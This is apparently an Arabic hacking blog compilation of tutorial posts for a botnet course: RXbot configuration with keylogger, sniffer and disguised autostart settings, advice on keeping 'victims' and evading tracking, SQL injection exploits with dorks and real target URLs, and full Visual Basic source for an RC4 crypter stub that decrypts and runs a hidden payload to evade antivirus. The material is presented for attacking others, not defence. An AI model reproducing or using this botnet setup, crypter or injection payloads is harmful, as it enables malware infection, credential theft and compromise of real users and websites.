شروحات وبرامج فى الهكر سوف تذهلك

السلام عليكم و رحمة الله و بركاته

اليوم شرحنا عن بدء الاختراق بالبوت نت

و هانستخدم اليوم نوع من البوت نت مكتوب بلغة ال c++

و اسم البوت المستخدم هو RXbot و معروف باتزانة فى النظام

و له خواص سنتعرف عليها فى الشرح بازن الله

اول شىء لازم نعرف ان الملف الرئيسى لمشروع البوت نت يكون بامتداد .dsw يعنى هنا هنجده باسم Rbot.dsw
ثانى شىء لازم نعرفها انه بيتم التعديل على سورس البوت نت من ملف اسمه config.h

و تكون محتوياته كالتالى :

كود PHP:

// bot configuration (Lsass by Uncanny)  int port = 6667;                // بورت الاتصال المخصص لاستقبال الضحايا int port2 = 6667;                // بورت ثانوى يعنى لو ان الضحايا ما اتصلوش بالبورت الاول .. يتم الاتصال بالبورت الثانى int socks4port = 38;            // Port # for sock4 daemon to run on  - CHANGE THIS!!! int tftpport = 69;                // Port # for tftp daemon to run on int httpport = 81;            // Port # for http daemon to run on int rloginport = 37;            // Port # for rlogin daemon to run on BOOL topiccmd = TRUE;            // set to TRUE to enable topic commands BOOL rndfile**** = TRUE;        // use random file **** BOOL AutoStart = TRUE;            // enable autostart registry keys char prefix = '.';                // علامة لتميز البوت نت عن باقى زوار الغرفة int maxrand = 6;                // عدد الاحرف العشوائية الى يتكون منها اسم الضحية عند الوصول int nicktype = CONSTNICK;        // nick type (see rndnick.h) BOOL nickprefix = TRUE;            // nick uptime & mirc 

قم بتغير الاعدادات للى تحبه

و هناك اعدادات السرفر كالتالى :

كود PHP:

char botid[] = "Tr0gBot";                        // bot id char version[] = "[RxBot v7.6 modded by Tr0gd0r]";        // Bots !version reply char password[] = "password";                    // باسورد الدخول للضحية char server[] = "no-ip";        // هنا تضع النو اى بى او السيرفر الخارجى char serverpass[] = "server-password";                        // هنا باسورد السرفر ان وجدت char channel[] = "#channel";                // القناه الى هايدخل فيها الضحية char server2[] = "no-ip2";                // سيرفر ثانوى يتصل بيه الضحية لو تعطل السرفر الاول char channel2[] = "#channel2";                        // القناه الثانوية char chanpass2[] = "";                        // باسورد القناة الثانوية char file****[] = "winmgr*****";            // destination file **** char keylogfile[] = "system.txt";                // keylog file**** char value****[] = "Microsoft Update Machine";        // value **** for autostart char nickconst[] = "n-";                    // first part to the bot's nick char szLocalPayloadFile[]="msconfig.dat";    // Payload file**** char modeonconn[] = "-x+B";                    // Can be more than one mode and contain both + and - char exploitchan[] = "#channel";                    // القناة المخصصة للاكسبلويت يعنى اى جهاز يتم اختراقه بالاكسلويت يص فيها char keylogchan[] =  "#channel";                     // القناة المخصصة لعرض نتيجة الكى لوجر char psniffchan[] = "#channel";                        // القناة المخصصة لعرض نتيجة السنفر و متوافق مع win 98 

و فى الشرح هانشوف طريقة التعديل و الترجمة
و بعد وصول التبليغ

شاهد الجزء الاول من هنا و هو تعديل الكونفج و ترجمة السورس و انتاج سيرفر بوت نت .



لتحميل الشرح من هنا على الميديا فير

كود PHP:

http://www.mediafire.com/?dojwj1njlrag393 

و شاهد الجزء الثانى و هو التعامل مع الضحية بعد وصول التبليغ




و لتحميل الجزء الثانى من الميديا فير من هنا

كود PHP:

http://www.mediafire.com/?a9p53xpsc7497a8 

و لتحميل السورس الخاص بالبوت نت rxbot7.0 من هنا

كود PHP:

http://www.mediafire.com/download.php?2nwmht7imji6pfm 

اى استفسار او نقطة غامضة برجاء تركها فى موضوع الاستفسارات
و سيتم الرد عليها فى اسرع وقت
و شكرااااا

ربنا افرغ علينا صبراا و توفنا مسلمين كود PHP: http://the-pentester.blogspot.com  https://www.facebook.com/groups/125125620985010/

[الشرح السادس] التخفى اثناء الاتصال بسيرفر الميرك الخارجى و ايجاد ضحايا

السلام عليكم و رحمة الله و بركاته
كيفكم اعضاء امان العرب الكرام

اليوم معنا شرح مطلوب للحفاظ عليك من الوقوع فى فخ التتبع

و هانتكلم فى شرحنا على طريقة التخفى باستخدام البروكسى
و الحصول على البروكسى من برنامج ProxySwitcher

لتحميل البرنامج من موقعه الرسمى :

كود PHP:

http://www.proxyswitcher.com/download.html 

كود PHP:

http://www.proxyswitcher.com/pub/ProxySwitcherStandard***** 

و يتضمن الشرح ايضا بيان خطورة ان يكون الضحايا على سرفر خارجى
انه يتعرض لها كل من هب و دب ...

لكن سنتعرض ايضا فى شرح قادم حماية الضحايا اذا كانو على سرفر خارجى ..

اترككم مع المشاهده ..

على الميديا فير

كود PHP:

http://www.mediafire.com/download.php?d8ankwij2pazczp 

للمشاهده على اليوتيوب من هنا ..




اى استفسار برجاء تركه فى موضوع الاستفسارات و سيتم الرد باسرع وقت

و شكراااااا

ربنا افرغ علينا صبراا و توفنا مسلمين كود PHP: http://the-pentester.blogspot.com  https://www.facebook.com/groups/125125620985010/

الاثنين، 17 نوفمبر، 2014

[الشرح الخامس]عمل سرفر محلى irc بطريقة سريعة و بيان الفرق بين المحلى و الخارجى

السلام عليكم و رحمة الله و بركاته
كيفكم اعضاء امان العرب

اليوم شرحنا سهل جدا و هو لكل من وجد صعوبة لعمل سيرفر IRC على جهازه ببرنامج IRCXpro
فقلت لابد من طرح السهل و الصعب

فشرحنا اليوم سهل جدا ما عليك الا متابعة الفيديو فقط
البرنامج المستخدم هو : IRCD hidden server

اما بخصوص الفرق بين استخدام سرفر خارجى او داخلى ؟
اولا السرفر الداخلى :
سيكون الضحايا فى مكان أمن لك
و تحافظ على الضحايا من الفقدان ( عندى ضحايا من سنه تقريبا لا زالو موجودين )
و لا يتعرض لهم كل من هب و دب على الانترنت و سنرى ذلك فى شرحنا القادم
فعندما تقوم بتشغيل برنامج سيرفر IRC فى جهازك ستتصل الضحايا بك

ثانيا بخصوص السرفر الخارجى :
قد يتم ايقاف السرفر نهائيا فتفقد الضحايا .
يكون السرفر الخارجى حل امثل لكل من يعانى من فتح بورت او مشاكل فى التبليغ ..
قد يتم تعقبك و القبض عليك . لكن سنتعرض لطرح الحماية من التعقب فى شروحات قادمة ان شاء الله
يتم التعرض للضحايا لكل من هب و دب ..

الان اترككم مع المقطع على اليوتيوب HD من هنا ..



الشرح على الميدا فاير

http://www.mediafire.com/?107vth4hmc7bhhf

الادوات على الميدا فاير

http://www.mediafire.com/?k1b9o7lgaov89ct

الملفات المرفقة

les6tools.txt‏

ثغرة shop sql تجنن غير معروفة 2013

سلام عليكم ورحمة الله

اقدم لكم اليوم ثغرة جديدة سكول لمواقع شوب

كود PHP:

# Exploit Title: Shop Script SQL Injections Vulnerability
# Type : PHP
# Date: 23-05-2010
# Author: fatal.001
# Dork: inurl:"step1.php?number=" 
                 Or
  # Dork: inurl:"/shop/step1.php?number=" 
 
 
  http://crobidolls.com/shop/step1.php?number=1186'
  http://www.dimdoll.com/shop/step1.php?number=222'
  http://www.iplehouse.net/shop/step1.php?number=2026'
  http://musedoll.com/shop/step1.php?number=568'
 
                                                                      ext......
 
 
 
--------------------------------------------------
 Greet To :
                         Mr SQl Rachid & MiN Badar & Achrraf & saidinho & Anash
                                  All Contacts Of Fatal.001@hotmail.fr                                                       
 
                                                                 Dr Yassine
 
 
_________________________________________________________________
Hotmail : une messagerie performante et gratuite avec une sécurité signée Microsoft
https://signup.live.com/signup.aspx?id=60969 

Link Dork

H-R

ثغرة في سكربت جوملا

[الشرح الرابع] تسطيب برنامج ميرك + الاتصال بسيرفر irc محلى و اتصال بسيرفر بخارجى

السلام عليكم و رحمه الله و بركاته
كيفكم اعضاء امان العرب
ان شاء الله تكونو بخير ان شاء الله

اليوم شرحنا دسم شوى
و ارجو التركيز فيه

قبل البدأ لابد من التعرف على بعض المصطلحات الهامة :
برنامج الميرك :

كود PHP:

http://www.mirc.com/get.html 

او من هنا
http://www.mediafire.com/download.php?ccetjusozinmss3

هو برنامج محادثة شبيه جدا بالياهو او الهوت ميل و سهل الاستخدام جدا

سيرفر IRC :



هو عبارة عن برنامج يقوم بانشاء سيرفر IRC و منها برنامج اسمه IRCxpro او غيره
لعمل سيرفر IRC فيمكنك من الاتصال به و عمل محادثه مع اى شخص
يوجد نوعين :
الاول :
سيرفر IRC خارجى و هو بيكون فى الغالب مثل :

كود PHP:

irc.host.com 

و يكون له بورت مفتوح مثل 6667 6668 6669 7000
او غيرهم ...

الثانى :
سيرفر IRC ايضا لكنك مثبته على جهازك لشخصى ( سيرفر محلى يعنى )
و تستخدم حساب النو اى بى الخاص بك للاتصال به ,,

غرفة الشات : ( channel )
و هى غرفه الدردشه .. يعنى بعد ما تتصل بسيرفر الميرك
لابد من دخول غرفة الدردشة و ستجد صديقك فيها للدردشة
و لكننا هنا سنجد الضحايا فيها ..



و تكون اسم الغرفة فى الغالب مسبوق بعلامة الشباك #
يعنى مثل :

كود PHP:

#botnets 

بازن الله فى الشرح هانشوف كيف نحمل برنامج الميرك و تثبيته
و الاتصال بسيرفرات خارجيه الموجودة فى قوائم برنامج الميرك
و هانشوف بازن الله كيفية عمل سيرفر IRC على جهازك الشخصى ..
و الاتصال به ..

- و قم بتطبيق الخطوات خطوة خطوة لعدم تفادى اى خطأ

ملحوظة مهمه جداااااااا:
فى حالة استخدام سيرفر IRC خارجى فلن تحتاج الى فتح بورت فى المودم الخاص بك
اما فى حالة استخدام سيرفر IRC على جهازك الشخصى فلابد من فتح بورت فى المودم حتى تستقبل الاتصالات الداخله على بورت (6667)
يمكنك تغير البورت للرقم الى تحبه لكن تضعه ببرنامج IRCxpro

يمكنك الاتصال على سبيل المثال بالسرفر دا

كود PHP:

irc.kickchat.com:6667 

نيجى الان لمشاهده المقطع على اليوتيوب HD من هنا



وهذا الشرح على الميدا فاير

كود PHP:

http://www.mediafire.com/?c4bn2hepbxup1xc 

وهنا الادوات مرفوعه على 2shared

كود PHP:

http://www.2shared.com/file/8P1rzi4f/IRCXpro.html 

اى نقطة غامضة برجاء تركها فى موضوع الاستفسارات و سيتم حل المشكلة بازن الله فى اسرع وقت !!

الملفات المرفقة

links.txt‏

ثغرة clip-buket 1.7.1 الحصول على اسم المستخدم وكلمة المرور

بسم الله الرحمن الرحيم

السلام عليكم

بما ان هاذي اول مشاركة لي في الموقع فقلت انشر ثغرة من اكتشافي

الدورك:

كود:

inurl:"videos.php?cat="

الاستغلال تقدر تستخدم برنامج havij أو

عن طريق الاستغلال اليدوي

تضيف اخر الرابط لما تطلع عدد العواميد

كود:

+from+cb_user

وبدال العامود المصاب

كود:

usern ame

شيل المسافة الموجودة في كلمة na me

ولما تاخذ اليوزر جاء وقت كلمة المرور

ضيف بدال العامود المصاب

كود:

password

المشكلة يطلع الباسورد في صورة هاش يصعب فكه

الي يلقى طريقة لفكه لا يبخل علينا في وضعها

مثال

كود:

http://alfatimi.tv/videos.php?cat=-1238+union+select+1,2,user****,4,5,6,7,8,9+from+cb_users--

مسار لوحة التحكم

كود:

http://localhost/admin_area/login.php

وفي الاخير كلمة شكر تكفي

[الشرح الثالث] IRC botnet تحميل الادوات + تسطيبها . [تم تحديث الروابط 8-1-2013]

السلام عليكم و رحمه الله و بركاته

كيفكم اعضاء امان العرب

اليوم نبدأ اول شرح فى ال IRC Botnets و هو تسطيب الادوات الخاصه به

ملاحظة : لا تنسى فك الديب فريز قبل التحميل

لمشهدة الشرح فيديو على اليوتيوب HD من هنا



و لتحميل الشرح من الميديا فير من هنا

كود PHP:

http://www.mediafire.com/download.php?kwl9qiskqunm999 

روابط التحميل للادوات من هنا

روابط الادوات مرفقة مع الموضوع

برنامج visual studio يحتوى على :
Visual basic 6
visual c++ 6

و بازن الله هانجتاج visual c++ 6.0
و روابط التحمييل الخاصة بالفيجوال ستوديو تعطلت للاسف
لكن ممكن نحمل ال visual c++ لواحده من هنا

كود PHP:

http://www.2shared.com/file/ml8Q_GFp/Microsoft_Visual_Studio_60part.htmlhttp://www.2shared.com/file/VEbgtwwK/Microsoft_Visual_Studio_60part.htmlhttp://www.2shared.com/file/OMSRfT_q/Microsoft_Visual_Studio_60part.html 

او تحميل الـ Microsoft Visual Studio 6 كامل مقسم ملفين من هنا ,,

http://www.gulfup.com/?tj13oA
http://www.gulfup.com/?vGPKx7

و التسطيب عادى جدا مثل الشرح على اليوتيوب
و بازن الله سيتم التزويد بتحديث الروابط اذا حدث خلل فيها

كود PHP:

Microsoft Platforms win sp2
Download:http://en.wikipedia.org/wiki/Microsoft_Windows_SDKhttp://www.microsoft.com/downloads/en/details.aspx?FamilyId=484269E2-3B89-47E3-8EB7-1F2BE6D7123A&displaylang=en 

و لكل من وجد صعوبة فى فك الملفات من مكتبة ال sdk
انا رفعت لكم الملفات مفكوكة جاهزة للتسطيب
من هنا

http://www.2shared.com/file/kxF94jKD...ms_By_BaD.html
http://www.2shared.com/file/P2ohWLMB...ms_By_BaD.html
http://www.2shared.com/file/xbbtuMPK...ms_By_BaD.html

كود PHP:

c++ 6 update core
http://www.microsoft.com/download/en/details.aspx?id=9183 

الملفات المرفقة

tools.txt‏

[الشرح الثانى] الحماية من البوت نت قبل الاختراق به .....

السلام عليكم و رحمه الله و بركاته



ان شاء الله تكونو بخير صحة و عافيه

بعد ما عرفنا نظره عامة عن البوت نت و ماهيته

وجب علينا بعد معرفه خطورته ,, الحمايه منه

و هو موضوعنا اليوم بازن الله

ان شاء الله سنستعرض لاكثر من أداه فى الحمايه

و يفضل العمل على ويندوز XP

و شرحنا اليوم لأداتين

اول أداه و هى Outpost Firewall





و هى اداه لدعم الجدار النارى للجهاز بحيث انها تقوم بملاحظة الجهاز

و لو انك فتحت برنامج مشبوه و ملغوم ,,

تقوم الاداه باخراج رساله تتضمن تفاصيل السرفر ( الهوست + البورت ) الخاصين بالملغم

و يكون لك خيارات قفل الاتصال او السماح للاتصال

و يفضل استخدام الاصدار المرفق لان الاصدار الاخير منها لا يحمل الخصائص المذكورة سالفا

الاداه الثانية هى معروفة و هى DeepFreez لتجميد النظام





بحيث يمكننا عمل ما يحلو لك من فتح سيرفرات و اختبارها و تشفيرها

ثم اعادة تشغيل الجهاز و يعود كل شىء كما كان عليه

[ملحوظه] نسخة الديب فريز المرفقة متوافقة مع ويندوز xp sp2 sp3

[ملحوظه] نسخة الديب فريز على ويندوز 7 قد لا تكون مستقرة اثناء استخدام البوت نت و اثناء التشفير .. فقد يتسلل السرفر الى ملف ال System Information Volume و الذى لا يفحصه الافيرا
فعند ازاله التجميد الخاص بالديب فريز و ايقاف الانتى فيروس ,, قد تجد البوت نت موجود بجهازك
دى نقطة لاحظتها كثير فى جهازى ,, لهذا اوصى بالاكس بى !!

اما اذا كنت حابب تعمل على ويندوز 7 اوك مافيش اى مشاكل
حمل نسخة الديب فريز المتوافقة مع كل الانظمة من موقع البرنامج هنا
http://www.faronics.com/en-uk/standa...p-freeze_en-uk

قم بتسطيب البرنامج عادى جدا و افتحه
اذا طلب منك Enter customization code اكتب اى رقم و احفظه
البرنامج يقوم بتوليد ملف تسطيب للديب فريز مخصص لك بالاعدادات الى انت بتحبها
فتفتح البرنامج بعد التسطيب و تعمل مثل الى بالصورة مع تعديل الباسورد الى على كيفك



ثم تعين التجميد على كل البارتيشنات



ثم تقوم بانشاء الملف التنفيزى الى هاتستخدمه فى تجميد الجهاز



ثم تحفظ الملف و تقم بتشغيله و سيتم تجميد الجهاز



هذا بخصوص الى على ويندوز 7 و حاب انه يجربها و انصحك باستخدام برنامج الحماية كاسبر

اما باقى الاخوة الى معهم ويندوز اكس بى فيمكنهم استخدام البرنامج المرفق على الميديا فير مباشره

كيفية فك الديب فريز او ازالته :
لا يمكن ازالة الديب فريز فى الوضع المجمد للجهاز
لكن يتم ازالته فى وضع فك التجميد
و لفك التجميد لابد من الضغط على shift + تضغط مرتين على ايكونة الديبفريز فى شريط ستارات بجوار الساعة
و تضع الباسورد الخاصه بك ثم تختار الوضع boot thawed و ترستر الجهاز
ازا اردت ازالته تمام من جهازك فتقوم بتشغيل برنامج التسطيب
سيعرض لك خيارات .. قم باختيار ازاله البرنامج و ستتم ازالته تمام

اتمنى لكم مشاهدة ممتعه مع المقطع على اليوتيوب HD هنا




وهذا رابط الادوات على الميديافير

http://www.mediafire.com/?atac72avbs2sl3b

رابط الشرح ايضا مرفوع على الميديا فير

http://www.mediafire.com/download.php?p8vzp3n4fx6cqcm


اى استفسارات يرجى تركها بموضوع الاستفسارات الخاص بالموضوع

و شكراااا

[الشرح الاول] مقدمة دورة البوت نت , سؤال و جواب حول البوت نت :::

بسم الله الرحمن الرحيم
السلام عليكم و رحمة الله و بركاته

كيفكم اخوانى اعضاء امان العرب
اقدم لكم دورة البوت نت و ان شاء الله هانستعرض كل كبيرة و صغيرة فى البوت نت
و كيف تتم برمجته و كيف يعمل و ما فوائدة و ما مميزاته

نبدأ باسم الله فى اول شرح من شروحات الدورة مع سؤال و جواب عن البوت نت

أولا : ما هى كلمة البوت نت ؟؟
كلمة Botnet هى كلمة تتكون من مقطعين
أول مقطع هو Bot و هو مأخوذ من كلمة Robot يعنى انسان ألى ....
ثانى مقطع هو net و هو مأخوذ من لفظ internet يعنى الشبكة العنكبوتية ..

من هنا يبرز معنى كلمة البوت نت أى هو كائن ألى يعمل على الانترنت بالوظائف التى تم برمجته عليها
و نقصد بكائن هنا أى سيرفر اختراق ..
يعنى البوت نت هو لفظ يطلق على عملية الاختراق التى تتم بسيرفر اختراق مبرمج برمجة خاصة موش زى برامج الاختراق التقليدية مثل
Prorat & Bifrost & Poison & arabian-attacker & Cerberus & و غيرهم

و هنا تبرز خطورتة انه يمكن برمجته لعمل اى شغلانة تعجبك , فالذى يخطر ببال مبرمج معين قد لا يخطر على بال مبرمج أخر , ,,
و من هنا يبرز ايضا خطورة اخرى ,, حيث لكل مبرمج عقل يفكر به
فقد يبرمج شخص سيرفر اختراق لما يفتحه احد ,, يقوم السيرفر باغلاق الكومبيوتر ولا يعمل الا بعد تنزيل ويندوز جديد على الجهاز
و قد يخطر ببال مبرمج أخر ان يبرمج سيرفر اختراق يرسل كل ما يكتبه الضحية >يعنى كيلوجر<
و قد يخطر ببال أخر ان يبرمج سيرفر يمتلك النظام بعد فتحه عند الضحية يعنى يمكنه من تصفح الملفات
و قد يفكر أخر ان يبرمج سيرفر يعمل كالسابق كله و ينتشر ايضا ..

ينتشر ؟؟؟ ايوه يقدر ينتشر !!
طيب نسأل دلوقتى ينتشر ازاى ؟؟ أو كيف ينتشر ؟؟؟
اقولك قد يبرمج مبرمج سيرفر اختراق يمتلك النظام و ينتشر فيه
قد ينتشر بالاتى ::

1-USB
يعنى الانتشار بالفلاشة
2-P2P (shared files & Network)
يعنى الانتشار بملفات المشتركة على الشبكة الداخلية ..
3- Exploits
يعنى اختراق باقى الاجهزة الموصلة على الشبكة و نقل السرفر لها و تشغيله عليها و وصول الاجهزة المخترقة كضحايا ::
4- spam
و هى طريقة عمل سبام عبر المسن او اى برنامج شات
بحيث ان السرفر يرسل نفسه الى الايميلات المسجلة فى مسن الضحية و ينطبق ذلك على الياهو
و الهوت ميل و الميرك و الجيميل و معظم برامج المحادثة :: ..
5- Rar & Zip ADD
يعنى يتم انتشار السرفر عن طريق اضافته تلقائيا الى كل الملفات المضغوطة على الجهاز
بحيث ينتشر اذا تم نقل اى ملف من جهاز الضحية الى جهاز اخر او برفع اى ملف الى الانترنت :: ..
6- ممكن ينتشر بكل الملفات بحيث انه يستبدل كل الملفات الموجودة بالسيرفر نفسه ..
و هناك طرق اخرى للانتشار هنتعرض لها فى الشروحات القادمة بازن الله !!

هنا بدأنا نتعرف على الفرق بين البوت نت و برامج الاختراق التقليدية
و هو الانتشار + البرمجة الخاصة + وسيلة التبليغ و استضافة الضحايا و غيرها !!

طيب الى الان نتسائل ,,, هل هناك انواع للبوت نت ؟؟؟
اقولك نعم فى انواع للبوت نت ,,
هناك اكتر من نوع ::
أول نوع irc botnet
ثانى نوع http botnet
ثالثا perl botnet

اولا : بى اتش بى او ال http
Zeus & Spy Eye & chimera & vertix & war bot و غيرهم
و غيرهم

و هى وسيلة لوصول الضحايا على صفحة انترنت
و من امكانياتها :
يمكن الحصول على الحسابات الشخصية للضحية مثل حسابات الياهو و الفيس بوك
و الهوت ميل و الحسابات البنكية مثل الباى بال و الفيز و اى حسابات بحيث انه بيتم التقاط
كل طلبات المتصفح و ارسالها لك و توجد امكانيات اخرى
و ايضا تحويل الضحايا الى برامج الاختراق العادية المعروفة كالبيفروست و غيرها
و سيتم شرحها بعدين :::...


ثانيا :
IRC ثانيا: بوت نت
هي وسيلة للتبليغ فى غرف ال irc يعنى فى الشات ,, سيتم شرحها بالتفصيل الممل قريب ,,

ثالثا و هو بوت نت المبرمج بالبيرل :
و هو خاص بتحويل السيرفرات الخترقة الى ضحايا مهما كان نظام تشغيلها
و سنتعرض لها ايضا بازن الله !!

ارجو ان يكون الكلام الى هنا مفهوم و واضح

وصلنا هنا الى رؤية عامة عن البوت نت لكن هناك كلام تانى كثير و خواص اخرى
سنتعرض لها فى الشروحات القادمة بازن الله !!

اى استفسارات او نقط غامضة برجاء تركها فى موضوع الاستفسارات
و ستتم الاجابة باسرع وقت مكن بازن الله


انتظرونا !!



BaD-HaCKeR-MaN

[الشرح الثالث] شرح اوامر لينكس + عمل سكريبتات تقوم بالبحث ..

[الشرح الثانى] تشغيل خدمات الـ Back|Track مثل [HTTP VNC TFTPD SSHD]

السلام عليكم و رحمة الله و بركاته



اليوم معنا شرح تشغيل خدمات الباك تراك .. الى هانتعرض لها بازن فى باقى الدورة ,,

اول شىء نيجى لتوصيل الانترنت و هانشرح طريقة توصيل الـ Back|Track بالانترنت سواء كان وهم او نظام اساسى ..
بحيث ان المشكلة تظهر لو كان نظام اساسى ,,
و يتم حلها بتطبيق الاوامر الموجودة بالشرح و وضع اى بى الجهاز + الروتر + الدى ان اس

نأتى للخدمات

اول خدمه HTTPD
و هى تشغيل الاباتشى ..
و تستخدم خدمة الاباتشى فى نقل الملفات او عمل Client Side Attack

ثانى خدمة هى SSHD
و تستخدم فى عمل الـ SSH-Tunnel
و سنستعرضها بازن الله فيما بعد ,,

ثالث خدمة هى خدمة الـ TFTPD
و تستخدم لنقل الملفات من و الى الجهاز المخترق او السرفر المخترق

رابع خدمة و هى خدمة VNC
و منها يمكن عمل اتصال بينك و بين الـ BackTrack اينما كان . .
او الاتصال بالسيرفرات الويندوز المخترقة عن طريقه ..

======

الاوامر المستخدمة فى الشرح

كود PHP:

root@bt:~# ifconfig eth0 192.168.1.100/24 root@bt:~# route add default gw 192.168.1.1 root@bt:~# echo ****server 192.168.1.1 > /etc/resolv.conf 

و امر

كود PHP:

dhclient 

اتتركم مع الشرح ..

http://www.youtube.com/watch?v=rTBu9MLK-o8
حمل الشرح مرفوع على الميديافير من هنا ..

كود PHP:

http://www.mediafire.com/download.php?gbkf3qxtlkyd6d7   

  . شرح كيفية تصميم برنآمج تشفـير بالفجوال بيسك

السلام عليكم

كيف الحال

مبين من العنوآن

اليوم بشرح لكم طريقه بسيطه لتصميم برنامج تشفير

طبعا بعد ماتصصمونه وتحسون طفشتم منه

تستطيعون انكم تطوورون الستب حق البرنامج

مثل تخطي مواقع الفحص الخ

ماعلينا

الحين بشرح لكم طريقه تصميم برنامج تشفير

وبرنامج راح يعتمد على شيئين

1- برنامج عادي يظهر للمستخدم

2- ستب وهو الى عليه كل كلام التشفير وغير ظاهر للمستخدم

يالله ندخل بالشرح

مختصر بصوره



طيب الحين نجي الاكوآد

كـواد البرنامج :_:

في التصريحات العامه (General ) :_:

كود PHP:

Option Explicit Const FileSplit = "<%*#%>" Const pw = "DnT%m25@#q&szlig;"  

في زر الاستعراض

Command1

نضع هذا الكود :

كود PHP:

    With CommonDialog1 ' انتظار اداه دايلق
    .Filter = "Excuteable Files (*exe) | ******" ' استعراض ملف صيغه exe تنفيذيه تستطيع انك تبدل
    .DialogTitle = "Select a File"
    .ShowOpen ' امر الاستعراض وجلب
    End With
****1.**** = CommonDialog1.File**** ' امر احضار الملف في مربع التكست  

النجوم رقم 1 تعني = T e x t

النجوم الثانيه تعني = N A M E

في زر التشفير

Command2

نضع هذا الكود :

كود PHP:

Dim sStube As String, sFile As String

Open App.Path & "\stube*****" For Binary As #1 ' اسم الستب sStube = Space(LOF(1)) Get #1, , sStube Close #1Open ****1.**** For Binary As #1 sFile = Space(LOF(1)) Get #1, , sFile Close #1Open App.Path & "\s3od*****" For Binary As #1  ' اسم الملف الناتج بعد التشفير Put #1, , sStube & FileSplit & RC4(sFile, pw) Close #1MsgBox "مبــروك تم تشفير الملف بنجآح"  

النجوم تعني = t e x t



في الموديل الى اضنفاه

ModRc4


نضع هذا الكود :_:

كود PHP:

Public Function RC4(ByVal Expression As String, ByVal Password As String) As String
On Error Resume Next
Dim RB(0 To 255) As Integer, X As Long, Y As Long, Z As Long, Key() As Byte, ByteArray() As Byte, Temp As Byte If Len(Password) = 0 Then
    Exit Function End If
If Len(Expression) = 0 Then
    Exit Function End If
If Len(Password) > 256 Then
    Key() = StrConv(Left$(Password, 256), vbFromUnicode)
Else
    Key() = StrConv(Password, vbFromUnicode) End If
For X = 0 To 255
    RB(X) = X
Next X
X = 0
Y = 0
Z = 0 For X = 0 To 255
    Y = (Y + RB(X) + Key(X Mod Len(Password))) Mod 256
    Temp = RB(X)
    RB(X) = RB(Y)
    RB(Y) = Temp
Next X
X = 0
Y = 0
Z = 0
ByteArray() = StrConv(Expression, vbFromUnicode)
For X = 0 To Len(Expression)
    Y = (Y + 1) Mod 256
    Z = (Z + RB(Y)) Mod 256
    Temp = RB(Y)
    RB(Y) = RB(Z)
    RB(Z) = Temp
    ByteArray(X) = ByteArray(X) Xor (RB((RB(Y) + RB(Z)) Mod 256)) Next X
RC4 = StrConv(ByteArray, vbUnicode) End Function  

..........................

بكذا يكون خلصنا من اكوآد البرنامج

نحفظه exe

ونضعه بمجلد الحاله ثم الان نجي لستب

ونضع اكوآده

الموديل الى في الستب

الاول

ModMain

الكود الذي يوضع فيه هو :

كود PHP:

Option Explicit Const FileSplit = "<%*#%>" Const pw = "DnT%m25@#qك" Public Declare Function ShellExecute Lib "shell32.dll" Alias "ShellExecuteA" (ByVal hwnd As Long, ByVal lpOperation As String, ByVal lpFile As String, ByVal lpParameters As String, ByVal lpDirectory As String, ByVal nShowCmd As Long) As LongPublic Sub Main() Dim sStub As String, sFile As String

Open App.Path & "\" & App********* & ".exe" For Binary As #1 ' اضافة ملف امتدآده تنفيذي
sStub = Space(LOF(1))
Get #1, , sStub ' اسم الستب
Close #1 ' اغلاق

sFile = Split(sStub, FileSplit)(1)

Open Environ("tmp") & "decrypted.exe" For Binary As #1
Put #1, , RC4(sFile, pw)
Close #1 'وضع نسخه باسم مسمي في التيمب واغلاق بعد الانتهاء


Call ShellExecute(0, vbNullString, Environ("tmp") & "decrypted.exe", vbNullString, vbNullString, 1) 'الاتصال بالملف الذي تم نسخه


End Sub  

النجوم تعني = N a m e

موديل رقم 2

باسم ModRc4

كود هـو :

كود PHP:

Public Function RC4(ByVal Expression As String, ByVal Password As String) As String
On Error Resume Next
Dim RB(0 To 255) As Integer, X As Long, Y As Long, Z As Long, Key() As Byte, ByteArray() As Byte, Temp As Byte If Len(Password) = 0 Then
    Exit Function End If
If Len(Expression) = 0 Then
    Exit Function End If
If Len(Password) > 256 Then
    Key() = StrConv(Left$(Password, 256), vbFromUnicode)
Else
    Key() = StrConv(Password, vbFromUnicode) End If
For X = 0 To 255
    RB(X) = X
Next X
X = 0
Y = 0
Z = 0 For X = 0 To 255
    Y = (Y + RB(X) + Key(X Mod Len(Password))) Mod 256
    Temp = RB(X)
    RB(X) = RB(Y)
    RB(Y) = Temp
Next X
X = 0
Y = 0
Z = 0
ByteArray() = StrConv(Expression, vbFromUnicode)
For X = 0 To Len(Expression)
    Y = (Y + 1) Mod 256
    Z = (Z + RB(Y)) Mod 256
    Temp = RB(Y)
    RB(Y) = RB(Z)
    RB(Z) = Temp
    ByteArray(X) = ByteArray(X) Xor (RB((RB(Y) + RB(Z)) Mod 256)) Next X
RC4 = StrConv(ByteArray, vbUnicode) End Function  

طيب الحين نحفظ الستب

باسم

Stube

ونحطه جنب البرنامج الى حفظناه ونستمتع بالتشفيره والبرمجه


تستطيع انك تبدل اسم الستب للي تحب عادي في الاكوآد حقت البرنامج

على شان محد يقول سعود قصر

ارفقت لكم في مجلد الصور + الاكوآد + السورس الى تم تطبيق عليه الشرح

على شان لما تخطئون تعرفون اخطأكم وين

لتحمـيل المشروع والشرح والاكواد من هنـآ


وان شاء الله اكون سويت لكم فائده